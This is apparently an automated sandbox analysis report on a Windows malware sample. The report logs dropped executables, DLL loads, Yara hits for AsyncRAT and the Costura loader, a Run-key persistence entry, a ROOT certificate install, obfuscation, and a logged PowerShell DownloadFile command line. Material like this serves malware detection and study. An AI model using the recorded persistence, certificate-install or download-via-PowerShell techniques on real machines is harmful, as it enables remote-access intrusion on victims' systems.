Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe File written: C:\Users\user\AppData\Local\Temp\Office Installer.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe File opened: C:\Windows\system32\MSFTEDIT.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Window detected: Number of UI elements: 13
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration Jump to behavior
Source: Gm602axA2d.exe Static file information: File size 19303424 > 1048576
Source: Gm602axA2d.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1222000
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Vulvvmkewji.exe, 00000003.00000002.2112262363.00000000086B1000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2112262363.0000000008701000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.2262077999.0000000009550000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Vulvvmkewji.exe, 00000003.00000002.2112262363.00000000086B1000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2112262363.0000000008701000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.2262077999.0000000009550000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 3.2.Vulvvmkewji.exe.7af0000.22.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 3.2.Vulvvmkewji.exe.7af0000.22.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 3.2.Vulvvmkewji.exe.7af0000.22.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 3.2.Vulvvmkewji.exe.7af0000.22.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 3.2.Vulvvmkewji.exe.7af0000.22.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 3.2.Vulvvmkewji.exe.7401a08.16.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 3.2.Vulvvmkewji.exe.7401a08.16.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 3.2.Vulvvmkewji.exe.7401a08.16.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 3.2.Vulvvmkewji.exe.7401a08.16.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 3.2.Vulvvmkewji.exe.7401a08.16.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Suspicious powershell command line found
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }"
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }" Jump to behavior
Yara detected Costura Assembly Loader
Source: Yara match File source: 16.2.Lxfrfbi.exe.57849f8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.77517a8.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.52049f8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.6e917a8.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.73817c8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.7291788.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.7701788.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.7701788.15.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.31fb2c0.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.7291788.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3a87008.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3a87008.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.72e17a8.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.4ef49f8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.6e41788.21.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.350ae90.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.6e41788.21.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.6f317c8.15.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.31fb2c0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.77f17c8.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.7a90000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.350ae90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2181412356.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2248433326.0000000007751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2181412356.0000000006E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2214020576.0000000005784000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2114944613.0000000004EF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2181412356.0000000006F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1818612437.0000000007169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1729748988.00000000050C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2248433326.0000000007701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2248433326.00000000077F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2070694207.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Vulvvmkewji.exe PID: 7280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR
PE file contains sections with non-standard names
Source: Office Installer.exe.0.dr Static PE information: section name: .gehcont
Source: Office Installer.exe.0.dr Static PE information: section name: .00cfg
Source: Office Installer.exe.0.dr Static PE information: section name: .gxfg
Source: Office Installer.exe.0.dr Static PE information: section name: _RDATA
Source: Office Installer.exe.0.dr Static PE information: section name: .debug_l
Source: Office Installer.exe.0.dr Static PE information: section name: .debug_i
Source: Office Installer.exe.0.dr Static PE information: section name: .debug_a
Source: Office Installer.exe.0.dr Static PE information: section name: .debug_a
Source: Office Installer.exe.0.dr Static PE information: section name: .debug_s
Source: Office Installer.exe.0.dr Static PE information: section name: .debug_f
Source: Office Installer.exe.0.dr Static PE information: section name: .modplug
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0520636B pushad ; ret 1_2_05206371
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_05206F11 pushad ; ret 1_2_05206F23
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_07D33D5E push FFFFFF8Bh; iretd 1_2_07D33D6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD9B9F0973 push E95B66D0h; ret 8_2_00007FFD9B9F09C9
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_081B3DA9 pushad ; ret 12_2_081B3DAC
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_07AF8465 push ebx; retf 16_2_07AF8492
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_07B82E5F pushfd ; retf 16_2_07B82E60
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_07B80AA7 pushad ; ret 16_2_07B80AB1

Persistence and Installation Behavior
barindex
Installs new ROOT certificates
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Tries to download and execute files (via powershell)
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }"
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }" Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\Gm602axA2d.exe File created: C:\Users\user\AppData\Local\Temp\Office Installer.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe File created: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Jump to dropped file
Source: C:\Users\user\Desktop\Gm602axA2d.exe File created: C:\Users\user\AppData\Local\Vulvvmkewji.exe Jump to dropped file

Boot Survival
barindex
Yara detected AsyncRAT
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Vulvvmkewji.exe PID: 7280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Lxfrfbi Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Lxfrfbi Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Stores large binary data to the registry
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
